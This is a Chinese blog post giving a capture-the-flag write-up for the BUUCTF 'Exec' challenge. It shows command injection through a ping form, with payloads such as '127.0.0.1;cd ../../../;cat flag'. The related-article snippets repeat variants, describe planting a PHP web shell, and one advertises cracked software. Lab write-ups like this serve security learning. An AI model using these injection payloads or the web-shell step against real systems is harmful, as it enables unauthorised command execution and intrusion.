buuctf_Exec

最新推荐文章于 2023-12-12 22:13:58 发布
最新推荐文章于 2023-12-12 22:13:58 发布
阅读量894 收藏 1
点赞数 1
分类专栏: BUUCTF 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61968245/article/details/122023717
版权

0x01 题目链接

BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges

0x02 题目

打开题目就看到大大的PING,二话不说直接ping个本地ip

涉及知识点:

    在命令执行的过程中,可以通过一些常用特殊字符来执行其他语句

    ;  //命令分割符,即当执行完第一个命令,继续执行下一个命令

    |   //管道

0x03 解题

那么尝试在当前文件加下,有什么东西吧

构造payload

 127.0.0.1;ls

 我们都知道在linux系统搭建的页面,通常显示页面的路径是/var/www/html,那么我们尝试返回当前路径查找

构造payload

 127.0.0.1;cd ../../../;ls

在返回前三层的时候找到了flag 字样

构造payload

127.0.0.1;cd ../../../;cat flag

flag{d96c26a0-0c45-4c45-98e7-b1431ed7d479}

SharpKean
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Backup_Exec_16.0_FP2_MultiPlatforms_Multilingual
04-22
最新的Backup_Exec_16.0_FP2多国语言版,包含简繁英常用语系,内含下载链接及Po_Jie(你懂的),大家放心,内有安装说明,亲测可用。仅供个人学习,请支持正版。
safe_exec-开源
07-29
SafeExec 是不安全 exec 函数的简单替代品。 它的工作方式与打开 php_safe_mode 中的“exec”完全相同,但不寻找 php_safe_mode 开关。 这意味着 safe_exec 始终尊重 safe_mode_exec_dir 指令。
BUUCTF【Web】Exec(命令执行漏洞)
qq_70434663的博客
03-02 1009
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。
BUUCTF web题目之Exec
最新发布
m0_54993799的博客
12-12 848
' > 123.php 点击ping后 ,复制url,在url后添加 /123.php , 用蚁剑连接 , 密码就是$_post[] 中括号里的内容。我输入 1| ls ,得到当前页面为index.php。127.0.0.1|whoami ,得到下面结果。测试连接成功后,点击添加 ,双击进入文件管理页面。查找文件夹,最后在根目录下发现flag。确定是根目录后,用cat查看flag。双击flag,即可看到flag内容。尝试cd到往上三层,但是没有成功。开启靶机并访问,得到下面的页面。
BUUCTF之Exec,攻防世界之command_execution
金 帛的博客
03-16 2093
BUUCTFWP
BUUCTF [ACTF2020 新生赛] Exec
Senimo
10-18 946
BUUCTF [ACTF2020 新生赛] Exec 启动靶机,打开环境: 页面可以执行Ping命令,判断应为命令执行漏洞 尝试输入正常IP127.0.0.1查看其回显: 127.0.0.1 其为正常回显,测试管道连接符|是否能用: 127.0.0.1 | ls 管道连接符|可以正常使用,并且ls命令可以正常执行 查看根目录: 127.0.0.1 | ls / 发现flag文件,使用cat命令查看: 127.0.0.1 | cat /flag 得到flag 基础的通过管道连接符|就可以的命
BUUCTF-[ACTF2020 新生赛]Exec1
Monica的博客
09-11 3845
目录 题目: 分析: 知识点: 方法: 方法1:;前面和后面命令都要执行,无论前面真假 方法2:|(就是按位或),直接执行|后面的语句 方法3:||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 方法4:&前面和后面命令都要执行,无论前面真假 方法5:&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 注意: 题目: 分析: 通过...
pcre_exec.rar_pcre_exec
09-24
《深入解析pcre_exec在Linux环境下的jsRegExpExecute源码》 在JavaScript的世界里,正则表达式(Regular Expression)是一种强大的文本处理工具,用于模式匹配、查找、替换等操作。在Linux环境中,正则表达式的实现...
EXEC_SQL.rar_EXEC S_Exec开发人员_delphi ex_exec sql_exec_sql.e
09-21
标题中的"EXEC_SQL.rar_EXEC S_Exec开发人员_delphi ex_exec sql_exec_sql.e"暗示了这是一个与编程相关的压缩包,特别关注的是执行SQL语句的功能。"EXEC_S"可能指的是在Delphi环境下开发的一个组件或函数,用于执行...
MySQL中slave_exec_mode参数详解
09-09
MySQL中的`slave_exec_mode`参数是用来控制从库在复制过程中如何处理可能出现的错误。这个参数在MySQL的复制架构中起到关键作用,特别是在处理数据不一致或冲突时。默认情况下,`slave_exec_mode`设置为`STRICT`模式...
BUUCTF————[ACTF2020 新生赛]Exec
qq_61579604的博客
11-02 112
只有一个index.php文件那么查看上级目录文件127.0.0.1|ls /使用命令127.0.0.1|ls查看此文件的目录。
BUUCTF 之 [ACTF2020 新生赛]Exec(命令执行漏洞)
两个月亮
01-08 1228
这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。文件往往位于根目录下,但也不要被反套路了。可以看到并没有我们期望的文件。这些文件夹都不需要管它,在。
BUUCTF-随便注、Exec、EasySQL、Secret File
m0_62905261的博客
06-13 777
目录[强网杯 2019]随便注[ACTF2020 新生赛]Exec[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File打开场景,里面有输入框,上面自带一个1,点击提交,有回显输入1 ' or '1'='1 有回显,因该是字符型猜测是sql注入,查询字段数,输入1' order by 1 #当查询到第三个字段的时候,回显异常,说明只有两个字段输入1' union select 1,2 # 回显一个正则过滤规则过滤了很多的东西 查询数据库,输入1'; show databa
【BUUCTF刷题记录】[ACTF2020新生赛]Exec
m0_60911102的博客
09-01 1373
BUUCTF刷题之命令执行---exec
BUUCTF [ACTF2020 新生赛]Exec
m0_49025459的博客
04-18 1457
题目 输入127.0.0.1|ls /看根目录 | 输入127.0.0.1|cat /flag看flag 这道题就是利用管道符来做 可以直接在ping输入框中输入1;cat /fag;也可以 1|cat /flag 1&cat /flag 当然如果使用 ||必须需要前面是一个假的,就是前面条件为假才执行后面的否则只执行前面的 所以可以用 a||cat /flag 以上方法都可以得到结果 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或).
BUUCTF__[ACTF2020 新生赛]Exec_题解
风过江南乱的博客
06-29 1255
前言 水题+水文,开始既结束 读题 打开和上次一样是ping一个IP 试试上次的拼接,直接127.0.0.1;cat /flag 得到flag 也可以用上次说的内联执行 cat ls ,得到源码,发现没有过滤。 最后 知识点和上次的ping一样,还更简单 附上题目链接 持续更新BUUCTF题解,写的不是很好,欢迎指正。 最后欢迎来访个人博客 ...
BUUCTF刷题记录 Exec
m0_46576074的博客
05-11 405
[ACTF2020 新生赛]Exec 进入页面 首先 127.0.0.1;ls 进行目录读取,然后 127.0.0.1;cat /flag 得flag
buuctf [ACTF2020 新生赛]Exec
SopRomeo的博客
02-28 1667
有点意思,ping ip 刚开始还以为是sql注入,想多了,直接命令执行,没有任何过滤! playload: 127.0.0.1;cat /flag ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200228205143468.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shad...
【BUUCTF】[ACTF2020 新生赛]Exec Writeup
algae
08-23 1417
|cat /flag 标记{f40182a0-6749-43f2-b223-9651bf2ef2d0}
pcntl_exec
09-22
pcntl_exec是一个PHP函数,用于在当前进程空间执行指定程序。它的作用是替换当前进程的代码和数据,用指定的程序来执行。pcntl_exec函数的第一个参数必须是可执行的二进制文件路径,或者是在文件第一行指定了可执行文件路径标头的脚本。第二个参数是命令行参数,第三个参数是环境参数。pcntl_exec函数的内部系统调用是execve。下面是一个示例代码: pcntl_exec("/usr/bin/php", ['demo.php', 'arg1', 'arg2'], ['ENV_VAR1=value1', 'ENV_VAR2=value2']); 在这个示例中,pcntl_exec函数将替换当前进程的代码和数据,用"/usr/bin/php"程序来执行,并将命令行参数设置为['demo.php', 'arg1', 'arg2'],环境参数设置为['ENV_VAR1=value1', 'ENV_VAR2=value2']。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值